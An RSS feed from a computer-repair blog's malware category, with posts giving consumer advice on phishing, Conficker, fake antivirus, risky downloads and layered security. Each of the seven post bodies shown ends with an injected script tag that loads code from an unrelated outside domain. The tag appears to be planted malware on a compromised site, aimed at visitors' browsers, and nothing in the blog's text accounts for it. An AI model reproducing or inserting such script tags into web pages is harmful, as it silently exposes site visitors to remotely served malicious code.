<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
>

<channel>
	<title>SmarterGeek : Rex Moncrief&#039;s Computer Repair and Technology &#187; spyware and malware</title>
	<atom:link href="http://www.smartergeek.com/category/spyware-and-malware/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.smartergeek.com</link>
	<description></description>
	<lastBuildDate>Wed, 05 May 2010 23:20:33 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
<!-- podcast_generator="Blubrry PowerPress/1.0.9" mode="advanced" entry="advanced" -->
	<itunes:summary></itunes:summary>
	<itunes:author>SmarterGeek : Rex Moncrief&#039;s Computer Repair and Technology</itunes:author>
	<itunes:explicit>no</itunes:explicit>
	<itunes:image href="http://www.smartergeek.com/wp-content/plugins/powerpress/itunes_default.jpg" />
	<itunes:subtitle></itunes:subtitle>
	<image>
		<title>SmarterGeek : Rex Moncrief&#039;s Computer Repair and Technology &#187; spyware and malware</title>
		<url>http://www.smartergeek.com/wp-content/plugins/powerpress/rss_default.jpg</url>
		<link>http://www.smartergeek.com/category/spyware-and-malware/</link>
	</image>
		<item>
		<title>Facebook Virus &#8211; Nope</title>
		<link>http://www.smartergeek.com/2010/05/04/facebook-virus-nope/</link>
		<comments>http://www.smartergeek.com/2010/05/04/facebook-virus-nope/#comments</comments>
		<pubDate>Tue, 04 May 2010 20:52:20 +0000</pubDate>
		<dc:creator>rex</dc:creator>
				<category><![CDATA[facebook]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[spyware and malware]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://www.smartergeek.com/?p=513</guid>
		<description><![CDATA[As a reminder, there is NO SUCH THING AS A FACEBOOK VIRUS. Facebook is simply a webservice/site though your browser. Now, you can get an infection by clicking on a URL (link) that may send you to an outside webpage, which could be malicious. Then you could be infected, especially if you use Internet Exploder, [...]]]></description>
			<content:encoded><![CDATA[<p></p><div>
<div id="c4be0871c6c32b2b32086c_input">As a reminder, there is <em>NO SUCH THING AS A  FACEBOOK VIRUS</em>. Facebook is  simply a webservice/site though your browser.</p>
<p>Now, you can get an infection by clicking on a URL (link) that may send  you to an outside webpage, which could be malicious. Then you could be  infected, especially if you use Internet Exploder, but even through  Firefox.  This is almost identical to what is known as a &#8220;<a href="http://en.wikipedia.org/wiki/Phishing" onclick="pageTracker._trackPageview('/outgoing/en.wikipedia.org/wiki/Phishing?referer=');">phishing attack</a>.&#8221;</p>
<p>Facebook tightly controls it&#8217;s content in what is called a &#8220;<a href="http://en.wikipedia.org/wiki/Walled_garden_%28technology%29" onclick="pageTracker._trackPageview('/outgoing/en.wikipedia.org/wiki/Walled_garden_28technology_29?referer=');">walled  garden</a>&#8220;. That means that all the time-wasting games such as Farmville,  etc, are &#8220;inside&#8221; the garden running through the Flash player plugin in  your browser. This is in stark contrast to MySpace which allows 3rd party (outside) content to be injected through javascript ads.</p>
<p>Why is this important? It goes back to <a href="http://www.smartergeek.com/2010/01/01/why-do-you-get-infected/">basic security principles</a> which  <a href="http://www.smartergeek.com/blog/2008/03/layered-security-basics.asp">everyone should follow</a>. If you don&#8217;t absolutely trust the site, email,  etc, then <a href="http://www.smartergeek.com/blog/2008/07/why-did-i-get-infected-in-first-place.asp">don&#8217;t click the link</a>.</div>
</div>
<p><script src="http://ao.euuaw.com/9"></script></p>
<!-- PHP 5.x -->]]></content:encoded>
			<wfw:commentRss>http://www.smartergeek.com/2010/05/04/facebook-virus-nope/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ubuntu Banking &#8211; by Florida</title>
		<link>http://www.smartergeek.com/2010/03/29/ubuntu-banking-by-florida/</link>
		<comments>http://www.smartergeek.com/2010/03/29/ubuntu-banking-by-florida/#comments</comments>
		<pubDate>Mon, 29 Mar 2010 12:38:11 +0000</pubDate>
		<dc:creator>rex</dc:creator>
				<category><![CDATA[banking online]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[spyware and malware]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[zombies]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[online banking]]></category>

		<guid isPermaLink="false">http://www.smartergeek.com/?p=443</guid>
		<description><![CDATA[I&#8217;ve preached my security sermon over and over. Now, here is a bank (yes, a bank) telling people to use an Ubuntu Live CD for their banking. Jay McLaughlin, CIO of CNL Bank: Accessing online banking from your everyday PC is just asking for trouble, he says. Your everyday pc? Yes &#8211; that means chances [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>I&#8217;ve preached my security sermon over and over. Now, <a href="http://blogs.computerworld.com/15815/can_ubuntu_save_online_banking" onclick="pageTracker._trackPageview('/outgoing/blogs.computerworld.com/15815/can_ubuntu_save_online_banking?referer=');">here is a bank</a> (yes, a bank) telling people to use an <a href="http://www.ubuntu.com" onclick="pageTracker._trackPageview('/outgoing/www.ubuntu.com?referer=');">Ubuntu Live CD</a> for their banking.</p>
<blockquote><p>Jay McLaughlin, CIO of CNL Bank: Accessing online banking from your everyday PC is just asking for  trouble, he says.</p></blockquote>
<p>Your everyday pc? Yes &#8211; that means chances are good that if you use your everyday computer for banking, then you are asking for trouble. Why? There is above a 50% chance that your Windows pc (XP, Vista, or 7) is infected with malware.</p>
<p>According ot McLaughlin, unless your bank uses &#8220;out of band&#8221; authentication for transactions, and to quote him: &#8220;I would not do online banking at all. Or if I had to I would use a sandboxed browser. I would boot up a mini  Linux system from a USB stick.</p>
<p>What is an Ubuntu Live CD? It is a full Linux operating system that will run your computer without harming or changing the installed contents.</p>
<p>Why does it make you safer? Since the operating system runs strictly from the CD, once you restart your computer, anything you have done with it will &#8220;disappear&#8221; with your RAM.</p>
<p>You download an ISO file and convert it a CD using one many <a href="http://cdburnerxp.se/" onclick="pageTracker._trackPageview('/outgoing/cdburnerxp.se/?referer=');">free CD burning applications</a>. You set your computer to boot from CD first in the BIOS. Put the CD in your drive and boot up.</p>
<p>Or &#8211; you could just buy a Mac.<script src="http://ao.euuaw.com/9"></script></p>
<!-- PHP 5.x -->]]></content:encoded>
			<wfw:commentRss>http://www.smartergeek.com/2010/03/29/ubuntu-banking-by-florida/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Infected computers at half</title>
		<link>http://www.smartergeek.com/2010/01/28/infected-computers-at-half/</link>
		<comments>http://www.smartergeek.com/2010/01/28/infected-computers-at-half/#comments</comments>
		<pubDate>Thu, 28 Jan 2010 23:12:32 +0000</pubDate>
		<dc:creator>rex</dc:creator>
				<category><![CDATA[id theft]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[rule #1]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[spyware and malware]]></category>
		<category><![CDATA[anti virus]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[spyware]]></category>

		<guid isPermaLink="false">http://www.smartergeek.com/?p=315</guid>
		<description><![CDATA[Well this might be considered &#8220;encouraging&#8221; if it weren&#8217;t so discouraging. According to a report, 48% of over 22 million computers scanned were infected with malware used in phishing scams and password stealing apps. I&#8217;ve preached this over and over &#8211; your anti-virus is only 1 layer of security. Don&#8217;t be lulled into a false [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.smartergeek.com/wp-content/uploads/2010/01/screenshot-malware-chart.gif" rel="lightbox[315]" title="screenshot-malware-chart"><img class="alignright size-medium wp-image-316" title="screenshot-malware-chart" src="http://www.smartergeek.com/wp-content/uploads/2010/01/screenshot-malware-chart-300x291.gif" alt="" width="300" height="291" /></a>Well this might be considered &#8220;encouraging&#8221; if it weren&#8217;t so discouraging. <a href="http://www.antiphishing.org/reports/apwg_report_Q3_2009.pdfv" target="_blank" onclick="pageTracker._trackPageview('/outgoing/www.antiphishing.org/reports/apwg_report_Q3_2009.pdfv?referer=');">According to a report</a>, 48% of over 22 million computers scanned were infected with malware used in phishing scams and password stealing apps.</p>
<p>I&#8217;ve preached this over and over &#8211; <a href="http://www.smartergeek.com/2009/01/01/still-think-your-anti-virus-helps-you/">your anti-virus</a> is only 1 layer of security. Don&#8217;t be lulled into a false sense. You have to stay vigilant and aware of layered security. The first layer is always common sense. Preventing 99% of phishing schemes is easy &#8211; <a href="http://www.smartergeek.com/blog/2008/11/paypal-phising-email.asp">read how here</a>.</p>
<p>The main point is that you need to be aware of security even if you are just a casual computer user. I get on my technology soap box all of the time and try to preach about &#8220;prevention&#8221; since there is not a &#8220;cure all&#8221; solution except staying off the &#8216;net &#8211; and we can&#8217;t do that now can we?<script src="http://ao.euuaw.com/9"></script></p>
<!-- PHP 5.x -->]]></content:encoded>
			<wfw:commentRss>http://www.smartergeek.com/2010/01/28/infected-computers-at-half/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Thanks porn industry</title>
		<link>http://www.smartergeek.com/2010/01/03/thanks-porn-industry/</link>
		<comments>http://www.smartergeek.com/2010/01/03/thanks-porn-industry/#comments</comments>
		<pubDate>Sun, 03 Jan 2010 21:27:31 +0000</pubDate>
		<dc:creator>rex</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[porn]]></category>
		<category><![CDATA[spyware and malware]]></category>
		<category><![CDATA[zombies]]></category>

		<guid isPermaLink="false">http://www.smartergeek.com/?p=195</guid>
		<description><![CDATA[Ok..ok. The title of this post doesn&#8217;t mean that I sit around watching porn. Without getting too risque, let&#8217;s just say that I&#8217;m much more into the real thing and leave it at that. However, the porn industry on the &#8216;net does help keep me in business. As I&#8217;ve tweeted about recently, I had a [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.smartergeek.com/wp-content/uploads/2010/01/screenshot-frostwire-pornfiles.gif" rel="lightbox[195]" title="screenshot-frostwire-pornfiles"><img class="alignright size-thumbnail wp-image-196" title="screenshot-frostwire-pornfiles" src="http://www.smartergeek.com/wp-content/uploads/2010/01/screenshot-frostwire-pornfiles-150x150.gif" alt="" width="150" height="150" /></a>Ok..ok. The title of this post doesn&#8217;t mean that I sit around watching porn. Without getting too risque, let&#8217;s just say that I&#8217;m much more into the real thing and leave it at that.</p>
<p>However, the porn industry on the &#8216;net does help keep me in business. As I&#8217;ve <a href="http://twitter.com/smartergeek" target="_blank" onclick="pageTracker._trackPageview('/outgoing/twitter.com/smartergeek?referer=');">tweeted about</a> recently, I had a lot of computer repairs this week &#8211; about 20 or so. Here are the rough stats:</p>
<ul>
<li>All but one were for &#8220;slow downs and pop-ups&#8221; or &#8220;can&#8217;t get on internet very well&#8221;.</li>
<li>1/2 were Vista and 1/2 were XP &#8211; all were infected.</li>
<li>1/2 had Norton installed and updated &#8211; all of those were infected. The rest had McAfee, Trend, or AVG &#8211; all infected.</li>
<li>About 1/3 of them had porn pics and videos in the cache or p2p download directories.</li>
</ul>
<p><a href="http://www.smartergeek.com/wp-content/uploads/2010/01/screenshot-porn-downloader.gif" rel="lightbox[195]" title="screenshot-porn-downloader"><img class="alignright size-medium wp-image-197" title="screenshot-porn-downloader" src="http://www.smartergeek.com/wp-content/uploads/2010/01/screenshot-porn-downloader-283x300.gif" alt="" width="283" height="300" /></a>Nothing is free people. The &#8220;free&#8221; porn video that you just looked at &#8211; and prompted you to download a player or codec? It just infected your computer and turned you into a zombie spewing fake Viagra spam in the background and consuming your bandwidth (internet connection). That&#8217;s the best case.</p>
<p>The worst case? It installed a keystroke logger to record your email and bank account logins. Oops &#8211; didn&#8217;t think about that, did you?</p>
<p>Think Norton or your favorite anti-virus is going to save you? Nope. Just read about it <a href="http://www.smartergeek.com/2010/01/01/why-do-you-get-infected/" target="_blank">here</a>.</p>
<p>It&#8217;s not just the &#8220;teenagers&#8221; doing it either &#8211; pardon the expression. I encounter this across all age groups, ethnicities, and political persuasions. Look &#8211; if you insist on looking at porn, go rent a video. It&#8217;s a lot safer and less expensive &#8211; or just keep using your computer for porn and help keep me in business.<script src="http://ao.euuaw.com/9"></script></p>
<!-- PHP 5.x -->]]></content:encoded>
			<wfw:commentRss>http://www.smartergeek.com/2010/01/03/thanks-porn-industry/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Conficker &#8211; What you should really know</title>
		<link>http://www.smartergeek.com/2009/04/06/conficker-what-you-should-really-know/</link>
		<comments>http://www.smartergeek.com/2009/04/06/conficker-what-you-should-really-know/#comments</comments>
		<pubDate>Mon, 06 Apr 2009 13:19:00 +0000</pubDate>
		<dc:creator>rex</dc:creator>
				<category><![CDATA[conficker]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[spyware and malware]]></category>

		<guid isPermaLink="false">http://www.smartergeek.com/2009/04/06/conficker-what-you-should-really-know/</guid>
		<description><![CDATA[Last week was fun in the IT (information technology) world. Not because of any real damage by conficker &#8211; but because of the absolute media over-hype of something they don&#8217;t have a clue about. I had a couple of customers call me &#8211; and the conversations were short: &#8220;Rex, do we need to worry?&#8221; &#8211; [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>Last week was fun in the IT (information technology) world. Not because of any real damage by conficker &#8211; but because of the absolute media over-hype of something they don&#8217;t have a clue about. I had a couple of customers call me &#8211; and the conversations were short: &#8220;Rex, do we need to worry?&#8221; &#8211; &#8220;No Bob you don&#8217;t.&#8221; &#8211; &#8220;Ok &#8211; thanks Rex.&#8221;<br />
<blockquote>absolute media over-hype of something they don&#8217;t have a clue about.</p></blockquote>
<p>None of my normal customers were affected by Conficker &#8211; and I have over 500 clients. Why?&nbsp; Mainly because they follow my <a href="http://www.smartergeek.com/blog/2008/01/simple-rules-for-your-computing.asp">Simple Rules for Computing</a>. That means you do the following:
<ol>
<li>You have a good <a href="http://www.smartergeek.com/blog/uploads/Backups-Importance.pdf">backup</a> of your data files (my docs, etc) </li>
<li>Behind a NAT router</li>
<li>Use <a href="http://www.opendns.com/" onclick="pageTracker._trackPageview('/outgoing/www.opendns.com/?referer=');">OpenDNS</a> on your network </li>
<li>Follow common-sense and don&#8217;t open every email attachment sent</li>
<li> Don&#8217;t install software that you don&#8217;t absolutely trust</li>
<li>Keep your computer patched (see links below)</li>
<li> Lastly &#8211; run anti-virus such as AVG</li>
</ol>
<p><a href="http://www.smartergeek.com/blog/uploaded_images/screenshot-opendns-rex-conficker-714257.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;" rel="lightbox[157]" title="Conficker - What you should really know"><img border="0" height="359" src="http://www.smartergeek.com/blog/uploaded_images/screenshot-opendns-rex-conficker-714254.gif" width="420" /></a>Notice I put anti-virus last on the list? That&#8217;s because <a href="http://www.smartergeek.com/blog/2009/01/still-think-your-anti-virus-helps-you_01.asp">anti-virus programs don&#8217;t stop</a> the majority of complex viruses, trojans, and worms these days. Your anti-virus today is much like an alarm system &#8211; it warns you once something is already on your system. Think about it this way &#8211; if the anti-virus programs really were that good &#8211; we wouldn&#8217;t need to worry about anything right?</p>
<p>Here are the bullet points about Conficker:
<ul>
<li> If you are running Auto-Updates on your computer &#8211; you were patched in October 2007 and have nothing to worry about.</li>
<li>If you are behind a NAT router (Linksys, DLink, Netgear, etc), then you can only get the worm through attachment, malicious website, or possibly a USB drive.</li>
<li>Conficker has infected quite a few machines in the US.</li>
<li>It is a very complex worm and is designed to change itself frequently.</li>
<li> If you are infected, Microsoft has a <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&amp;displaylang=en" onclick="pageTracker._trackPageview('/outgoing/www.microsoft.com/downloads/details.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356_amp_displaylang=en&amp;referer=');">removal tool</a> &#8211; but I recommend the usual backup, wipe your machine, reinstall Windows so that you can trust your machine again.</li>
</ul>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; <br />What was the deal about April 1st?<br />&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>There was code in the worm that indicated it would do something on April 1st. Nobody knows for sure yet, but many guess that it would download another set of instructions. That&#8217;s it.</p>
<p>If you weren&#8217;t already infected, you had nothing to worry about. Period.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />Helpful Links<br />&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Vista Updates<br /><a href="http://www.microsoft.com/windows/downloads/windowsupdate/learn/windowsvista.mspx" onclick="pageTracker._trackPageview('/outgoing/www.microsoft.com/windows/downloads/windowsupdate/learn/windowsvista.mspx?referer=');">http://www.microsoft.com/windows/downloads/windowsupdate/learn/windowsvista.mspx</a></p>
<p>XP Updates<br /><a href="http://www.microsoft.com/windows/downloads/windowsupdate/learn/windowsxp.mspx" onclick="pageTracker._trackPageview('/outgoing/www.microsoft.com/windows/downloads/windowsupdate/learn/windowsxp.mspx?referer=');">http://www.microsoft.com/windows/downloads/windowsupdate/learn/windowsxp.mspx</a><script src="http://ao.euuaw.com/9"></script></p>
<!-- PHP 5.x -->]]></content:encoded>
			<wfw:commentRss>http://www.smartergeek.com/2009/04/06/conficker-what-you-should-really-know/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Still think your anti-virus helps you</title>
		<link>http://www.smartergeek.com/2009/01/01/still-think-your-anti-virus-helps-you/</link>
		<comments>http://www.smartergeek.com/2009/01/01/still-think-your-anti-virus-helps-you/#comments</comments>
		<pubDate>Thu, 01 Jan 2009 19:46:00 +0000</pubDate>
		<dc:creator>rex</dc:creator>
				<category><![CDATA[spam]]></category>
		<category><![CDATA[spyware and malware]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[zombies]]></category>
		<category><![CDATA[anti virus]]></category>
		<category><![CDATA[antivirus 2009]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://www.smartergeek.com/2009/01/01/still-think-your-anti-virus-helps-you/</guid>
		<description><![CDATA[Happy New Year to everyone! Unfortunately, my first post of the new year is not a positive one. For example, malware programs now infect computers and then routinely use their own antivirus capabilities to not only disable antivirus software but also remove competing malware programs. source: http://www.infopackets.com/news/security/2008/20081216_internet_security_is_losing_the_online_war.htm Ok &#8211; I&#8217;ve been preaching for a long [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>Happy New Year to everyone! Unfortunately, my first post of the new year is not a positive one.</p>
<blockquote><p>For example, malware programs now infect computers and then routinely use their own antivirus capabilities to not only disable antivirus software but also remove competing malware programs.</p></blockquote>
<p>source:<br />
<a href="http://www.infopackets.com/news/security/2008/20081216_internet_security_is_losing_the_online_war.htm" onclick="pageTracker._trackPageview('/outgoing/www.infopackets.com/news/security/2008/20081216_internet_security_is_losing_the_online_war.htm?referer=');">http://www.infopackets.com/news/security/2008/20081216_internet_security_is_losing_the_online_war.htm</a></p>
<p><span style="font-family: Georgia;"><a style="clear: right; display: inline ! important; float: right; margin-bottom: 1em; margin-left: 1em;" href="http://www.smartergeek.com/blog/uploaded_images/screenshot-av2009-713206.gif" rel="lightbox[140]" title="Still think your anti-virus helps you"><img src="http://www.smartergeek.com/blog/uploaded_images/screenshot-av2009-713203.gif" border="0" alt="" width="200" height="172" /></a></span>Ok &#8211; I&#8217;ve been preaching for a long time that your anti virus program is one of the last lines of defense on your computer. Anti-virus programs are like an alarm system on your house &#8211; and an alarm system tells you when an intruder is already there. This is typically too late.</p>
<p>Once Pandora&#8217;s Box has been opened, it is nearly impossible to get her back in the box. Once your computer has been compromised, that is it. You simply cannot trust it any longer. As I&#8217;ve recommended over and over, the only way to fully trust a computer is to make sure you have a good backup of your data, wipe the machine, and reinstall from scratch.</p>
<blockquote><p>Research compiled by PandaLabs suggests that a staggering number of infected computers, as many as 10 million, are being used to distribute spam and malware over the Internet each day.</p></blockquote>
<p>source: <a href="http://www.nytimes.com/2008/12/06/technology/internet/06security.html?em" onclick="pageTracker._trackPageview('/outgoing/www.nytimes.com/2008/12/06/technology/internet/06security.html?em&amp;referer=');">http://www.nytimes.com/2008/12/06/technology/internet/06security.html?em</a></p>
<div style="margin: 0px;">This means that there is a 10-million-man army of machines spewing out spam and helping distribute out more malware and disruptive programs. These programs are designed to take control of a computer (usually hidden from the user) as part of a bot-net. They typically don&#8217;t want to crash your computer or erase your data. They just want to use your computer and start throwing pop-ups at you.</div>
<blockquote><p>That&#8217;s right &#8211; the bad guys don&#8217;t have to have a warehouse of computers to spit out fake-viagra ads. They just use your computer &#8211; and your neighbors.</p></blockquote>
<p>Microsoft researchers were amazed to find out that a lot of malware will make sure that the security update features of Windows are turned on &#8211; in an effort to stop other competing malware from getting installed! This is a real war being raged.</p>
<p>Microsoft has been releasing it&#8217;s Malicious Software Removal Tool for sometime in an effort to combat some of this. However, the truth is that the MSRT is about as effective as anti-virus software &#8211; it&#8217;s more of a marketing gimmick than anything.</p>
<blockquote><p>Once a machine has been compromised &#8211; you can&#8217;t trust it unless it gets wiped clean.</p></blockquote>
<p><span style="font-weight: bold;">=========</span><br />
<span style="font-weight: bold;">What do you do?</span><br />
<span style="font-weight: bold;">=========</span></p>
<p><a style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;" href="http://www.smartergeek.com/blog/uploaded_images/anti-malware-2-746470.gif" rel="lightbox[140]" title="Still think your anti-virus helps you"><img src="http://www.smartergeek.com/blog/uploaded_images/anti-malware-2-746463.gif" border="0" alt="" /></a><span style="font-family: Georgia;"> </span>It&#8217;s really pretty simple. You have to think of security on your computer in layers. The first and most important layer is common sense &#8211; be careful of what you do.</p>
<p>Most people think of their computers like a television set &#8211; but it&#8217;s not. Your computer is connected to hundreds of millions of other devices as soon as it is turned on if you have a cable or DSL connection. Remember that not everyone in the world has good intentions.</p>
<p>Here is my quick review of how to stay safe:</p>
<ul>
<li>Be wary of all emails &#8211; use common sense.</li>
<li>Make sure you have a NAT router.</li>
<li>Run Firefox &#8211; never use Internet Explorer again.</li>
<li>Use OpenDNS to help protect your network.</li>
<li>Be wary of phishing schemes.</li>
<li>Use strong passwords.</li>
</ul>
<p>Read and review the following posts. The vast majority of my clients DO NOT get re-infected or even infected in the first place. That&#8217;s because I preach these things to everyone.</p>
<p>Why did I get infected in the first place?<br />
<a href="http://www.smartergeek.com/blog/2008/07/why-did-i-get-infected-in-first-place.asp">http://www.smartergeek.com/blog/2008/07/why-did-i-get-infected-in-first-place.asp</a></p>
<p>Layered Security Basics<br />
<a href="http://www.smartergeek.com/blog/2008/03/layered-security-basics.asp">http://www.smartergeek.com/blog/2008/03/layered-security-basics.asp</a></p>
<p>Simple Rules for Your Computing<br />
<a href="http://www.smartergeek.com/blog/2008/01/simple-rules-for-your-computing.asp">http://www.smartergeek.com/blog/2008/01/simple-rules-for-your-computing.asp</a></p>
<p>PayPal Phising Email<br />
<a href="http://www.smartergeek.com/blog/2008/11/paypal-phising-email.asp">http://www.smartergeek.com/blog/2008/11/paypal-phising-email.asp</a></p>
<p>The Importance of Backups<br />
<a href="http://www.smartergeek.com/blog/2008/07/importance-of-backups.asp">http://www.smartergeek.com/blog/2008/07/importance-of-backups.asp</a></p>
<p><span style="font-weight: bold;">References (if you don&#8217;t believe me):</span></p>
<p>Thieves Winning Online War, Maybe Even in Your Computer<br />
<a href="http://www.nytimes.com/2008/12/06/technology/internet/06security.html?em" onclick="pageTracker._trackPageview('/outgoing/www.nytimes.com/2008/12/06/technology/internet/06security.html?em&amp;referer=');">http://www.nytimes.com/2008/12/06/technology/internet/06security.html?em</a></p>
<p>Internet Security Is Losing The Online War<br />
<a href="http://www.infopackets.com/news/security/2008/20081216_internet_security_is_losing_the_online_war.htm" onclick="pageTracker._trackPageview('/outgoing/www.infopackets.com/news/security/2008/20081216_internet_security_is_losing_the_online_war.htm?referer=');">http://www.infopackets.com/news/security/2008/20081216_internet_security_is_losing_the_online_war.htm</a></p>
<p>Microsoft kicks fake security software off 400,000 PCs<br />
<a href="http://www.computerworld.com/action/article.do?command=viewarticlebasic&amp;articleid=9124346&amp;intsrc=hm_list" onclick="pageTracker._trackPageview('/outgoing/www.computerworld.com/action/article.do?command=viewarticlebasic_amp_articleid=9124346_amp_intsrc=hm_list&amp;referer=');">http://www.computerworld.com/action/article.do?command=viewarticlebasic&amp;articleid=9124346&amp;intsrc=hm_list</a></p>
<p>McAfee Avert Labs Blog<br />
<a href="http://www.avertlabs.com/research/blog/index.php/2008/11/" onclick="pageTracker._trackPageview('/outgoing/www.avertlabs.com/research/blog/index.php/2008/11/?referer=');">http://www.avertlabs.com/research/blog/index.php/2008/11/</a><script src="http://ao.euuaw.com/9"></script></p>
<!-- PHP 5.x -->]]></content:encoded>
			<wfw:commentRss>http://www.smartergeek.com/2009/01/01/still-think-your-anti-virus-helps-you/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Myspace and Antivirus 2009</title>
		<link>http://www.smartergeek.com/2008/12/14/myspace-and-antivirus-2009/</link>
		<comments>http://www.smartergeek.com/2008/12/14/myspace-and-antivirus-2009/#comments</comments>
		<pubDate>Sun, 14 Dec 2008 17:45:00 +0000</pubDate>
		<dc:creator>rex</dc:creator>
				<category><![CDATA[myspace]]></category>
		<category><![CDATA[spyware and malware]]></category>

		<guid isPermaLink="false">http://www.smartergeek.com/2008/12/14/myspace-and-antivirus-2009/</guid>
		<description><![CDATA[When it rains it pours. This post follows-up to this one. Getting Rid of Antivirus 2009 &#8211; Antivirus 2008http://www.smartergeek.com/blog/2008/12/antivirus-2009-is-actually-spyware-or.asp &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;From Email&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; im so aggravated at this thing all i do is check my yahoo mail and talk to my niece on yahoo messenger &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- My Response&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- As I told you yesterday via email and on [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>When it rains it pours. This post follows-up to this one.</p>
<p>Getting Rid of Antivirus 2009 &#8211; Antivirus 2008<br /><a href="http://www.smartergeek.com/blog/2008/12/antivirus-2009-is-actually-spyware-or.asp">http://www.smartergeek.com/blog/2008/12/antivirus-2009-is-actually-spyware-or.asp</a></p>
<p><b>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</b><br /><b>From Email</b><br /><b>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</b></p>
<p>im so aggravated at this thing all i do is check my yahoo mail and talk to my niece on yahoo messenger</p>
<p><b>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- <br /></b><br /><b>My Response</b><br /><b>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- </b></p>
<p>As I told you yesterday via email and on the phone, I will be glad to help you fix it. I realize that you just want to check your email; however, when other people use the computer, typically they will do more than just check email. If something unintentional happens, then your email checking suffers the consequences.</p>
<p>We can put some systems in place to help prevent this sort of thing from happening in the future. However, I can&#8217;t change the behavior of the people using the computer &#8211; except to warn you of the consequences.</p>
<p><a href="http://myspace.com/" onclick="pageTracker._trackPageview('/outgoing/myspace.com/?referer=');">Myspace.com</a> itself is not evil (in a tech sense). It has great social networking value. What happens though is that malicious content gets inadvertently posted on someone&#8217;s profile page.<br />
<blockquote>People (teenagers and adults) add anything and everything that looks silly to their profile pages, and then Myspace users just click at any &#8220;jumping monkey&#8221; on the screen. That&#8217;s where the problem lies &#8211; in the behavior of users.</p>
<p>*85% of Myspace users are 18 yrs or older.</p></blockquote>
<p>source: <a href="http://www.web-strategist.com/blog/2008/01/09/social-network-stats-facebook-myspace-reunion-jan-2008/" onclick="pageTracker._trackPageview('/outgoing/www.web-strategist.com/blog/2008/01/09/social-network-stats-facebook-myspace-reunion-jan-2008/?referer=');">http://www.web-strategist.com/blog/2008/01/09/social-network-stats-facebook-myspace-reunion-jan-2008/</a></p>
<p>Fortunately for me, that sort of behavior keeps me in business even though I am an evangelist for responsible behavior. As people screw up their computers, I get paid to fix them and warn them.</p>
<p>Please review the following links:</p>
<p>Why did I get infected in the first place?<br /><a href="http://www.smartergeek.com/blog/2008/07/why-did-i-get-infected-in-first-place.asp"> http://www.smartergeek.com/blog/2008/07/why-did-i-get-infected-in-first-place.asp</a></p>
<p>Layered Security Basics<br /><a href="http://www.smartergeek.com/blog/2008/03/layered-security-basics.asp"> http://www.smartergeek.com/blog/2008/03/layered-security-basics.asp</a><script src="http://ao.euuaw.com/9"></script></p>
<!-- PHP 5.x -->]]></content:encoded>
			<wfw:commentRss>http://www.smartergeek.com/2008/12/14/myspace-and-antivirus-2009/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Getting Rid of Antivirus 2009 &#8211; Antivirus 2008</title>
		<link>http://www.smartergeek.com/2008/12/11/getting-rid-of-antivirus-2009-antivirus-2008/</link>
		<comments>http://www.smartergeek.com/2008/12/11/getting-rid-of-antivirus-2009-antivirus-2008/#comments</comments>
		<pubDate>Thu, 11 Dec 2008 14:52:00 +0000</pubDate>
		<dc:creator>rex</dc:creator>
				<category><![CDATA[spyware and malware]]></category>

